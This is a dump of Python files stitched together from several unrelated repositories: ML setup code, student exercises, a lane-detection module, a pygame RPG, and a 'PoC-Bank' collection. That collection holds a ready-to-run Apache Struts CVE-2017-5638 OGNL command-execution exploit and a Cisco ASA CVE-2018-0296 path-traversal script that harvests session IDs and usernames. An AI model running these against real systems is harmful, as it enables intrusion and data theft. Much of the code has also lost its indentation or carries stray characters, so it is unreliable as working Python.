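    # Hedged usage sketch (assumption: X and y are torch tensors; each item
    # is a sliding window of length seq_len with the label aligned to the
    # window's last step):
    #
    #   import torch
    #   from torch.utils.data import DataLoader
    #   X, y = torch.randn(100, 3), torch.randn(100)
    #   ds = TimeseriesDataset(X, y, seq_len=10)
    #   xb, yb = next(iter(DataLoader(ds, batch_size=4)))  # xb: (4, 10, 3)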
```
#### File: 3jane/pytorch_ext/setup.py
```python
from setuptools import setup, find_packages
from pip._internal.network.session import PipSession
from pip._internal.req import parse_requirements
pip_session = PipSession()
with open('.version') as f:
    VERSION = f.read().strip()
def parse_reqs(path):
return [r.requirement for r in parse_requirements(path, session=pip_session)]
with open('README.md') as f:
DESCRIPTION = f.read()
setup(
name='pytorchext',
version=VERSION,
author='<EMAIL>',
author_email='<EMAIL>',
description='pytorch extension',
long_description=DESCRIPTION,
long_description_content_type='text/markdown',
url='https://github.com/3jane/pytorch_ext',
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
python_requires='>=3.6',
packages=find_packages(include=["pytorchext*"]),
install_requires=parse_reqs('requirements.txt'),
)
``` |
{
"source": "3keepmovingforward3/ENGR1102",
"score": 4
} |
#### File: python/code sprint/code sprint 4.py
```python
import pprint
"""
* PREMISE: This Code Sprint is meant to test your proficiency in array
* creation and manipulation. It will also test your ability to
* construct a proper loop. Lastly, it will test your ability to breakdown
* a problem into smaller subsections, i.e. functions.
*
* INPUT: You are given one 2-dimensional array, inventory, as input that correspond
* to the inventory list of your supermarket. You are also given a target department
* to search for when obtaining the total product count. Lastly, you are given an
* option, always '0' for this Code Sprint, that dictates what task, i.e. which created
* function to call, you will perform.
*
* OUTPUT: You are to RETURN a single integer from your created function, which
* holds the total product count from the target department. Then you are to display
* this result using the required string format given to you above.
"""
def store_owner(inventory, option, target, sale_item, price_change, count_change):
if len(inventory) == 0:
print("Error: Empty list!")
else:
print("Welcome to ENGR 1102's Stop-n-shop!")
if option == '0':
print("That was last weeks' problem!")
elif option == '1':
updatePrice(inventory,sale_item,price_change)
elif option == '2':
updateQuantity(inventory,sale_item,count_change)
else:
print("I don't know how to do that!")
##########################################################################################
# Start your function(s) under here
##########################################################################################
def updatePrice(inventory,sale_item,price_change):
print("Which item do you wish to update the price for?")
j = 0
    for i in range(len(inventory)):
        if inventory[i][0] == sale_item:
            j = i
print(sale_item)
print("Please enter the new price of "+str(sale_item)+ ":")
inventory[j][2]= price_change
inventory[j][3]= 10
print(inventory[j][2])
print("The new inventory is:")
for rows in inventory:
print(rows)
return()
print("We don't have any "+sale_item+" left in stock.")
def updateQuantity(inventory,sale_item,count_change):
print("Which item do you wish to update the quantity for?")
j=0
    for j in range(len(inventory)):
if inventory[j][0] == sale_item:
print(sale_item)
print("Please enter the new quantity of "+str(sale_item)+":")
inventory[j][3]= count_change
print(count_change)
print("The new inventory is:")
for rows in inventory:
print(rows)
return()
print("We don't have any "+sale_item+" left in stock.")
```
#### File: coreskillsdemo/coreskillsans/popularity_contest.py
```python
from collections import Counter, OrderedDict
def popularity_contest(name_list):
    cnt = Counter()
    for word in name_list:
        cnt[word] += 1
    final = OrderedDict(sorted(cnt.items(), key=lambda t: t[0]))
    for key, word in final.items():
        print(key, "got", word, "votes.")
    winner = cnt.most_common(1)[0][0]
    print(winner, "Wins!")
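# Hedged usage sketch:
#
#   popularity_contest(["Ann", "Bob", "Ann"])
#   # Ann got 2 votes.
#   # Bob got 1 votes.
#   # Ann Wins!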
```
#### File: conditional code/which books do i need for class/task.py
```python
def books_collections(book):
    # Implemented from the task description left in the original comments:
    if book == "Calculus":
        return "I have my Calculus book."
    elif book == "History":
        return "I have my History book."
    elif book == "Circuits":
        return "I have my Circuits book."
    return " I don't have that book."
```
#### File: console input and output/middle ground/task.py
```python
def m_g():
# Start your code below (tip: Make sure to indent your code)
return()
```
#### File: data types/stringsandintergers/task.py
```python
def count_eggs(eggsJohn, eggsMary):
# Start your code below (tip: Make sure to indent your code)
return()
```
#### File: functions/getting started with functions/task.py
```python
import math
def factorial(num):
return(math.factorial(num))
```
#### File: loops/counter/task.py
```python
def counter(endCount):
f = open("test.txt","w")
# ***User Code Below*** #
for __ in range(______):
# Non User Code
f.write(str(____)+"\n")
# User Code
print(_____)
# ***End User Code*** #
f.close
```
#### File: loops/Nth Factorial/task.py
```python
import math
def nth_fact(nth):
# Enter your code here
return(math.factorial(nth))
```
#### File: objects/creating your first object/task.py
```python
class Rectangle(object):
    length = 0
    width = 0
    # This is an initialization function for a class in Python.
    # Each object has its own length and width, set via the self keyword.
    def __init__(self, length, width):
        self.length = length
        self.width = width
    # Class functions below compute derived values from the class variables.
    def getArea(self):
        return self.length * self.width
    def getPerimeter(self):
        return 2 * (self.length + self.width)
```
#### File: objects/iterating over objects/task.py
```python
def getCount(objects):
# Write your code here.
return()
```
#### File: variables/Gradebook/task.py
```python
def grade_avrg():
# User Code Below
return ()
``` |
{
"source": "3keepmovingforward3/suiron",
"score": 3
} |
#### File: suiron/core/SuironCV.py
```python
"
import math
import cv2
import numpy as np
# Median blur
def get_median_blur(gray_frame):
return cv2.medianBlur(gray_frame, 5)
# Canny edge detection
def get_canny(gray_frame):
return cv2.Canny(gray_frame, 50, 200, apertureSize=3)
# Hough lines
def get_lane_lines(inframe):
frame = inframe.copy()
ret_frame = np.zeros(frame.shape, np.uint8)
# We converted it into RGB when we normalized it
gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
gray = get_median_blur(gray)
canny = get_canny(gray)
# Hough lines
# threshold = number of 'votes' before hough algorithm considers it a line
lines = cv2.HoughLinesP(canny, 1, np.pi/180, threshold=25, minLineLength=40, maxLineGap=100)
try:
r = lines.shape[0]
except AttributeError:
r = 0
    for i in range(r):
for x1, y1, x2, y2 in lines[i]:
# Degrees as its easier for me to conceptualize
angle = math.atan2(y1-y2, x1-x2)*180/np.pi
# If it looks like a left or right lane
# Draw it onto the new image
if 100 < angle < 170 or -170 < angle < -100:
cv2.line(ret_frame, (x1, y1), (x2, y2), (255, 255, 255), 10)
return ret_frame
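# Hedged usage sketch (assumption: frames were normalised to RGB earlier in
# the pipeline, as the comment in get_lane_lines notes):
#
#   frame = cv2.cvtColor(cv2.imread('road.jpg'), cv2.COLOR_BGR2RGB)
#   lanes = get_lane_lines(frame)   # white lane segments on a black image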
```
#### File: suiron/utils/datasets.py
```python
import numpy as np
import pandas as pd
from suiron.utils.img_serializer import deserialize_image
from suiron.utils.functions import raw_to_cnn
# Gets servo dataset
def get_servo_dataset(filename, start_index=0, end_index=None):
    data = pd.read_csv(filename, index_col=0)
# Outputs
x = []
# Servo ranges from 40-150
servo = []
for i in data.index[start_index:end_index]:
# Don't want noisy data
if data['servo'][i] < 40 or data['servo'][i] > 150:
continue
# Append
x.append(deserialize_image(data['image'][i]))
servo.append(raw_to_cnn(data['servo'][i]))
return x, servo
# Gets motor output dataset
# Assumption is that motor and servo has
# some sort of relationship
def get_motor_dataset(filename, start_index=0, end_index=None):
    data = pd.read_csv(filename, index_col=0)
# Servo
servo = []
# Motor ranges from 40-150
motor = []
for i in data.index[start_index:end_index]:
# Don't want noisy data
if data['motor'][i] < 40 or data['motor'][i] > 150:
continue
if data['servo'][i] < 40 or data['servo'][i] > 150:
continue
# Append
servo.append(raw_to_cnn(data['servo'][i]))
motor.append(raw_to_cnn(data['motor'][i], min_arduino=60.0, max_arduino=90.0))
return servo, motor
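# Hedged usage sketch (assumptions: a CSV written by the data-collection
# step with 'image', 'servo' and 'motor' columns; the filename is
# hypothetical):
#
#   x, servo = get_servo_dataset('data/output_0.csv')
#   servo_in, motor = get_motor_dataset('data/output_0.csv')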
```
#### File: suiron/utils/functions.py
```python
import numpy as np
#Map function from arduino
def arduino_map(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
# Converts raw values to target (Y) values
# for the convolutional neural network
def raw_to_cnn(y, min_arduino=40.0, max_arduino=150.0):
    # Servo values span min_arduino..max_arduino (40-150 by default).
    # Map them to values between 0 and 1, because the network's output
    # neurons only produce values in that range.
y_ = arduino_map(y, min_arduino, max_arduino, 0.0, 1.0)
return [y_]
# Converts convolutional neural network outputs
# to raw outputs
def cnn_to_raw(y, min_arduino=40.0, max_arduino=150.0):
# Get highest index value and map
# it back
y_ = y[np.argmax(y)]
# degrees to output
y_ = arduino_map(y_, 0.0, 1.0, min_arduino, max_arduino)
return y_
# Motor to RGB color based on speed
def raw_motor_to_rgb(x):
if x <= 90:
if x < 70:
return (255, 0, 0)
elif x < 80:
return (255, 165, 0)
else:
return (0, 255, 0)
elif x > 90:
if x > 120:
return (255, 0, 0)
elif x > 110:
return (255, 165, 0)
else:
return (0, 255, 0)
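# Hedged sanity check: raw_to_cnn and cnn_to_raw are inverses over the
# default 40-150 range.
#
#   raw_to_cnn(95.0)                 # -> [0.5]
#   cnn_to_raw(np.array([0.5]))      # -> 95.0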
``` |
{
"source": "3KFreaky/Python",
"score": 3
} |
#### File: 3KFreaky/Python/Tkinter Work.py
```python
import tkinter
top = tkinter.Tk()
top.title("Click A Button!")
import random
def clear():
print("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
def compliment():
compliment = random.randint(1,9)
if compliment == 1:
print("Your Beautiful!")
elif compliment == 2:
print("Your Smile is Amazing!")
elif compliment == 3:
print("You look great today!")
elif compliment == 4:
print("You're a smart cookie!")
elif compliment == 5:
print("I like your style!")
elif compliment == 6:
print("You are the most perfect you there is!")
elif compliment == 7:
print("You're an awesome friend!")
elif compliment == 8:
print("You light up the room!")
elif compliment == 9:
print("You're all that and a super-size bag of chips!")
def insult():
insult = random.randint(1,9)
if insult == 1:
print("You’re a good example of why some animals eat their young.")
elif insult == 2:
print("I didn’t attend Your funeral, but I sent a nice letter saying I approved of it.")
elif insult == 3:
print("I thought men like you shot themselves.")
elif insult == 4:
print("I can’t believe that out of 100,000 sperm, you were the quickest.")
elif insult == 5:
print("I like your style! where did you steal it?")
elif insult == 6:
print("We all have to wait in line to hate you.")
elif insult == 7:
print("You seem to have descended from the chimpanzee later than everyone else")
elif insult == 8:
print("You must have been born on a highway, because that's where most accidents happen.")
elif insult == 9:
print("You're so ugly Hello Kitty said goodbye to you.")
def THECODE():
count = 0
while count != 1:
print("739823748923748923743289472389472389472347398237489237489237432894723894723894723473982374892374892374328947238947238947234739823748923748923743289472389472")
print("347234732894823904848239048239048239482393472347328948239048482390482390482394823934723473289482390484823904823904823948239347234732894823904848239048239048")
print("739823748923748923743289472389472389472347398237489237489237432894723894723894723473982374892374892374328947238947238947234739823748923748923743289472389472")
print("483290483258464303485349493490593405934054832904832584643034853494934905934059340548329048325846430348534949349059340593405483290483258464303485349493490593")
print("347234732894823904848239048239048239482393472347328948239048482390482390482394823934723473289482390484823904823904823948239347234732894823904848239048239048")
A = tkinter.Button(top, text ="Compliment", command = compliment)
B = tkinter.Button(top, text="CLEAR", command = clear)
C = tkinter.Button(top, text ="Insult", command = insult)
D = tkinter.Button(top, text = "THE CODE", command = THECODE)
A.pack()
C.pack()
D.pack()
B.pack()
top.mainloop()
#copyright <NAME> 2017
``` |
{
"source": "3kwa/datoms",
"score": 2
} |
#### File: 3kwa/datoms/test_datoms.py
```python
import doctest
import datoms
def test_module_doctest():
failure_count, _ = doctest.testmod(datoms)
assert failure_count == 0
``` |
{
"source": "3kwa/ipython",
"score": 2
} |
#### File: html/notebook/fabfile.py
```python
from fabric.api import local,lcd
from fabric.utils import abort
import os
static_dir = 'static'
components_dir = os.path.join(static_dir,'components')
def test_component(name):
if not os.path.exists(os.path.join(components_dir,name)):
components()
def components():
"""install components with bower"""
with lcd(static_dir):
local('bower install')
def css(minify=True):
"""generate the css from less files"""
test_component('bootstrap')
test_component('less.js')
if minify not in ['True', 'False', True, False]:
abort('minify must be Boolean')
minify = (minify in ['True',True])
min_flag= '-x' if minify is True else ''
with lcd(static_dir):
local('lessc {min_flag} less/style.less css/style.min.css'.format(min_flag=min_flag))
``` |
{
"source": "3l3n01/lift-pass",
"score": 3
} |
#### File: lift-pass/src/app.py
```python
import math
from datetime import datetime
from flask import Flask, jsonify, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
db = SQLAlchemy(app)
class Price(db.Model):
id = db.Column(db.Integer, primary_key=True)
type = db.Column(db.String(80), unique=True, nullable=False)
cost = db.Column(db.Integer, nullable=False)
def __repr__(self):
return '<Price %s: %d>' % (self.type, self.cost)
class Holiday(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
date = db.Column(db.Date, nullable=False)
def __repr__(self):
return '<Holiday %s: %s>' % (self.name, self.date)
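# Hedged seeding sketch (assumption: run once before serving requests; the
# costs match the values the test suite expects):
#
#   db.create_all()
#   db.session.add(Price(type='Jour', cost=35))
#   db.session.add(Price(type='Night', cost=19))
#   db.session.commit()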
@app.route('/prices')
def prices():
price = Price.query.filter_by(type=request.args.get('type')).first()
if int(request.args.get('age')) < 6:
return jsonify({'cost': 0})
else:
if request.args.get('type') != 'Night':
holidays = Holiday.query.all()
is_holiday = False
reduction = 0
for holiday in holidays:
if request.args.get('date'):
date = datetime.strptime(
request.args.get('date'), '%Y-%m-%d').date()
if date == holiday.date:
is_holiday = True
            if not is_holiday and request.args.get('date') and datetime.strptime(request.args.get('date'), '%Y-%m-%d').weekday() == 0:
reduction = 35
if int(request.args.get('age')) < 15:
return jsonify({'cost': math.ceil(price.cost * 0.7)})
else:
if not request.args.get('age'):
cost = price.cost * (1 - reduction / 100)
return jsonify({'cost': math.ceil(cost)})
else:
if int(request.args.get('age')) > 64:
cost = price.cost * 0.75 * (1 - reduction / 100)
return jsonify({'cost': math.ceil(cost)})
else:
cost = price.cost * (1 - reduction / 100)
return jsonify({'cost': math.ceil(cost)})
else:
if int(request.args.get('age')) >= 6:
if int(request.args.get('age')) > 64:
return jsonify({'cost': math.ceil(price.cost * 0.4)})
else:
return jsonify({'cost': price.cost})
else:
return jsonify({'cost': 0})
```
#### File: 3l3n01/lift-pass/test_app.py
```python
import pytest
from src.app import app
def test_base():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 20, 'date': '2020-05-08', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 35
def test_night():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 20, 'date': '2020-05-08', 'type': 'Night'})
json_data = response.get_json()
assert json_data['cost'] == 19
def test_child():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 5, 'date': '2020-05-08', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 0
def test_elderly():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 65, 'date': '2020-05-08', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 27
def test_elderly_night():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 65, 'date': '2020-05-08', 'type': 'Night'})
json_data = response.get_json()
assert json_data['cost'] == 8
def test_holiday():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 20, 'date': '2020-12-25', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 35
def test_monday():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 20, 'date': '2020-05-04', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 23
``` |
{
"source": "3lackrush/PoC-Bank",
"score": 2
} |
#### File: PoC-Bank/CVE-2017-5638/CVE-2017-5638.py
```python
import urllib2
import httplib
class PoC(object):
'''
CVE-2017-5638 Struct2 S2-045 Proof of Concept
'''
def __init__(self, url):
'''
Initialize
'''
self.url = url
self.cmd = 'echo EvilCorp'
def _generatePayload(self):
'''
Generate Payload.
'''
payload = "%{(#_='multipart/form-data')."
payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % self.cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
return payload
def run(self):
'''
S2-045 Check!
'''
payload = self._generatePayload()
url = self.url
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
request = urllib2.Request(url, headers=headers)
page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
page = e.partial
if "EvilCorp" in page:
print("Site is vulnerable with S2-045!")
else:
print("Site is not Vulnerable!")
if __name__ == '__main__':
obj1 = PoC('http://192.168.0.104/memoshow.action?id=3')
obj1.run()
```
#### File: PoC-Bank/CVE-2018-0296/cisco_asa.py
```python
import requests
import sys
import urlparse
import os
import re
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
regexSess = r"([0-9])\w+'"
regexUser = r"(user:)\w([^']*)"
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"
def banner():
print("""
Cisco ASA - Path Traversal
CVE-2018-0296
Author: <NAME>(@yassineaboukir)
""")
def is_asa(): # Verify target is using Cisco ASA
try:
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
except:
print("[-] Couldn't establish connection with the target host.")
sys.exit(1)
if "webvpnLang" in is_cisco_asa.cookies:
pass
else:
print("[-] Couldn't confirm it's Cisco ASA. E.g: https://vpn.example.com/+CSCOE+/logon.html\n")
sys.exit(1)
def extract_info():
#Extract directory content
try:
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False, timeout = 15)
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False, timeout = 15)
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False, timeout = 15)
if str(filelist_r.status_code) == "200":
with open(urlparse.urlparse(url).hostname + ".txt", "w") as cisco_dump:
cisco_dump.write("[+] Directory: \n {}\n[+] +CSCEO+ Directory:\n {}\n[+] Active sessions:\n {}\n[+] Active Users:\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
#Extract user list
matches_sess = re.finditer(regexSess, active_sessions_r.text)
for match_sess in matches_sess:
active_users_r = requests.get(urlparse.urljoin(url,"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/" + str(match_sess.group().strip("'"))), verify=False, timeout = 15)
matches_user = re.finditer(regexUser, active_users_r.text)
for match_user in matches_user:
cisco_dump.write(match_user.group() + "\n")
print("[+] Host is vulnerable! The dump was saved to {}".format(dir_path))
else:
print("[-] The host doesn't appear to be vulnerable.")
except:
print("[-] Connection timed out! Could be on purpose (Timeout set to 15s) to prevent DoS'ing the server, so please run the script one last time to confirm.")
sys.exit(1)
if __name__ == '__main__':
banner()
is_asa()
extract_info()
``` |
{
"source": "3l-d1abl0/Utilities",
"score": 2
} |
#### File: Utilities/DurationCheck/durationcheck.py
```python
from pathlib import Path
import argparse
import subprocess32 as subprocess
import os
import sys
def getDuration(filename):
    filename = str(filename)
    try:
        # universal_newlines makes stdout a str instead of bytes
        output = subprocess.run(["ffprobe", "-v", "error", "-show_entries",
                                 "format=duration", "-of",
                                 "default=noprint_wrappers=1:nokey=1", filename],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT,
                                universal_newlines=True)
    except subprocess.CalledProcessError:
        return '0.0'
    duration = output.stdout.strip("\n")
    return '0.0' if duration == "N/A" else duration
def folderDuration(folderPath):
duration =0.0
for path in Path(folderPath).iterdir():
info = path.stat()
if os.path.isdir(str(path)):
curr_scope = float(folderDuration(path))
duration += curr_scope
print("{}/ --> {}".format( path, curr_scope) )
elif str(path).endswith('.mp4') or str(path).endswith('.avi'):
curr_scope = float(getDuration(path))
duration += curr_scope
print("{} --> {}".format( path, curr_scope) )
return duration
if __name__=="__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-f", "--path", required=True, help=" \"path\" to target folder")
args = vars(ap.parse_args())
FOLDER_PATH = str(args["path"])
print("\nScanning Folder :\n{} ... \n".format(FOLDER_PATH))
if not os.path.isdir(FOLDER_PATH):
print("** Please enter a valid Folder Path **")
exit()
elif os.path.exists(os.path.dirname(FOLDER_PATH))==False:
print("** This folder path does not exist **")
exit()
TOTAL_MIN=0
TOTAL_SEC=0
duration = folderDuration(FOLDER_PATH)
print(duration)
    TOTAL_SEC += int(duration % 60)
    TOTAL_MIN += int(duration / 60) + TOTAL_SEC // 60
    TOTAL_SEC = TOTAL_SEC % 60
    print("Total Duration: {}hr {}min {}secs ".format(TOTAL_MIN // 60, TOTAL_MIN % 60, TOTAL_SEC))
``` |
{
"source": "3ldr0n/elzring",
"score": 3
} |
#### File: elzring/core/game.py
```python
import sys
import pygame
from player import Player
from menu import Menu
from music import Music
from rooms import OpeningBeachRoom, FollowingBeach
from gamesettings import GameSettings as gs
from gamesettings import GameStates
from textinput import TextInput
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption("Elzring")
self.screen = pygame.display.set_mode(gs.SCREEN_SIZE)
self.state = GameStates.START_MENU
self.clock = pygame.time.Clock()
self.FPS = 30
def _set_screen(self):
self.screen.fill(gs.BACKGROUND)
def draw_grid(self):
for x in range(0, gs.SCREEN_WIDTH, gs.TILESIZE):
pygame.draw.line(self.screen, gs.LIGHT_GREY,
(x, 0), (x, gs.SCREEN_HEIGHT))
for y in range(0, gs.SCREEN_HEIGHT, gs.TILESIZE):
pygame.draw.line(self.screen, gs.LIGHT_GREY,
(0, y), (gs.SCREEN_WIDTH, y))
def name_input(self, inputs, events):
"""Creates text input dialogue for the name input.
Parameters
----------
inputs: dict
Dict of inputs.
events: list
Events queue.
"""
input_name_text = "Qual o seu nome?"
font = pygame.font.SysFont(None, gs.TILESIZE*5)
rendered_font = font.render(input_name_text, True, gs.WHITE)
self.screen.blit(
rendered_font, (1000 - rendered_font.get_rect().width,
0 + rendered_font.get_rect().height))
if inputs["name_input"].update_text(events):
self.player.set_name(inputs["name_input"].get_input())
self.state = GameStates.PLAYING
inputs["name_input"].draw(self.screen)
def load_rooms(self):
opening_beach_room = OpeningBeachRoom()
opening_beach_room.load_map()
following_beach_room = FollowingBeach()
following_beach_room.load_map()
rooms = {
"current_room": opening_beach_room,
"opening_beach_room": opening_beach_room,
"following_beach_room": following_beach_room
}
return rooms
def update_sprites(self):
self.tile_group.update()
self.characters_sprites.update()
self.collision_tile_group.update()
def empty_sprites(self):
self.tile_group.empty()
self.collision_tile_group.empty()
self.trespassing_tile_group.empty()
def run(self):
self.player = Player(self)
self.characters_sprites = pygame.sprite.Group(self.player)
menu = Menu(self.screen)
name_input = TextInput(
gs.SCREEN_WIDTH // 2 - (gs.TILESIZE * 18) // 2,
gs.SCREEN_HEIGHT // 2 - (gs.TILESIZE * 4) // 2,
18, 4)
inputs = {
"name_input": name_input
}
rooms = self.load_rooms()
self.tile_group = pygame.sprite.Group()
self.collision_tile_group = pygame.sprite.Group()
self.trespassing_tile_group = pygame.sprite.Group()
while True:
self.clock.tick(self.FPS)
self._set_screen()
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if self.state == GameStates.START_MENU:
menu.run(self)
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
self.state = GameStates.SET_NAME
elif self.state == GameStates.SET_NAME:
self.name_input(inputs, events)
elif self.state == GameStates.PLAYING:
rooms["current_room"].render(self, self.player, self.screen)
self.tile_group.draw(self.screen)
self.characters_sprites.draw(self.screen)
self.player.update()
self.empty_sprites()
pygame.event.pump()
pygame.display.flip()
```
#### File: elzring/core/items.py
```python
import pygame
from gamesettings import GameSettings as gs
class Item(pygame.sprite.Sprite):
def __init__(self, name, value, description):
super().__init__()
self.name = name
self.value = value
self.description = description
class Weapon(Item):
def __init__(self, name, value, description, damage):
super().__init__(name, value, description)
self.base_damage = damage
class Inventory:
pass
```
#### File: elzring/core/player.py
```python
import os
import pygame
from gamesettings import GameSettings as gs
class Player(pygame.sprite.Sprite):
def __init__(self, game):
super().__init__()
self.game = game
self.width = 32
self.height = 64
self.spritesheet = pygame.image.load(
os.path.join(gs.ASSETS, "characters/main.png")).convert_alpha()
self.__walk_up_images = self.__set_walk_up_images()
self.__walk_up_index = 0
self.__walk_down_images = self.__set_walk_down_images()
self.__walk_down_index = 0
self.__walk_right_images = self.__set_walk_right_images()
self.__walk_right_index = 0
self.__walk_left_images = self.__set_walk_left_images()
self.__walk_left_index = 0
# Base values used to start the sprite rect object.
self.set_idle_image(0, 0)
self.name = None
self.hp = 100
self.maxhp = 100
self.inventory = []
self.current_room = None
self.speed = gs.TILESIZE / 5
def __set_walk_up_images(self):
"""Cuts all the necessary images for the walking up animation. """
walk_up_images = []
for i in range(9):
self.spritesheet.set_clip(pygame.Rect(
16+i*self.width, 8*self.height, self.width, self.height)),
walk_up_image = self.spritesheet.subsurface(
self.spritesheet.get_clip())
walk_up_images.append(walk_up_image)
return walk_up_images
def __set_walk_down_images(self):
"""Cuts all the necessary images for the walking down animation. """
walk_down_images = []
for i in range(9):
self.spritesheet.set_clip(pygame.Rect(
16+i*self.width, 10*self.height, self.width, self.height)),
walk_down_image = self.spritesheet.subsurface(
self.spritesheet.get_clip())
walk_down_images.append(walk_down_image)
return walk_down_images
def __set_walk_right_images(self):
"""Cuts all the necessary images for the walking right animation. """
walk_right_images = []
for i in range(9):
self.spritesheet.set_clip(pygame.Rect(
16+i*self.width, 11*self.height, self.width, self.height)),
walk_right_image = self.spritesheet.subsurface(
self.spritesheet.get_clip())
walk_right_images.append(walk_right_image)
return walk_right_images
def __set_walk_left_images(self):
"""Cuts all the necessary images for the walking left animation. """
walk_left_images = []
for i in range(9):
self.spritesheet.set_clip(pygame.Rect(
16+i*self.width, 9*self.height, self.width, self.height)),
walk_left_image = self.spritesheet.subsurface(
self.spritesheet.get_clip())
walk_left_images.append(walk_left_image)
return walk_left_images
def set_current_room(self, room):
self.current_room = room
def set_name(self, name):
self.name = name
def set_idle_image(self, x=None, y=None):
"""Set the player's idle image.
Parameters
----------
x: int
x axis position.
y: int
y axis position.
"""
if x is None and y is None:
x = self.rect.x
y = self.rect.y
self.image = self.__walk_down_images[0]
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
def set_walking_up_image(self):
self.image = self.__walk_up_images[self.__walk_up_index]
rect = self.image.get_rect()
rect.x = self.rect.x
rect.y = self.rect.y
self.rect = rect
def set_walking_down_image(self):
self.image = self.__walk_down_images[self.__walk_down_index]
rect = self.image.get_rect()
rect.x = self.rect.x
rect.y = self.rect.y
self.rect = rect
def set_walking_right_image(self):
self.image = self.__walk_right_images[self.__walk_right_index]
rect = self.image.get_rect()
rect.x = self.rect.x
rect.y = self.rect.y
self.rect = rect
def set_walking_left_image(self):
self.image = self.__walk_left_images[self.__walk_left_index]
rect = self.image.get_rect()
rect.x = self.rect.x
rect.y = self.rect.y
self.rect = rect
def __increment_walk_up_index(self):
"""Increments correctly the animation index, if the value is too
high the methods sets the index back to zero.
"""
self.__walk_up_index = (
self.__walk_up_index + 1) % len(self.__walk_up_images)
def __increment_walk_down_index(self):
"""Increments correctly the animation index, if the value is too
high the methods sets the index back to zero.
"""
self.__walk_down_index = (
self.__walk_down_index + 1) % len(self.__walk_down_images)
def __increment_walk_right_index(self):
"""Increments correctly the animation index, if the value is too
high the methods sets the index back to zero.
"""
self.__walk_right_index = (
self.__walk_right_index + 1) % len(self.__walk_right_images)
def __increment_walk_left_index(self):
"""Increments correctly the animation index, if the value is too
high the methods sets the index back to zero.
"""
self.__walk_left_index = (
self.__walk_left_index + 1) % len(self.__walk_left_images)
def is_alive(self):
"""Check if user is alive.
Returns
-------
bool
Life bigger than zero.
"""
return self.hp > 0
def check_border(self):
if self.rect.x >= gs.SCREEN_WIDTH - self.width:
self.rect.x = gs.SCREEN_WIDTH - self.width
if self.rect.x <= gs.SCREEN_BORDER:
self.rect.x = gs.SCREEN_BORDER
if self.rect.y <= gs.SCREEN_BORDER:
self.rect.y = gs.SCREEN_BORDER
if self.rect.y + self.height > gs.SCREEN_HEIGHT - gs.SCREEN_BORDER:
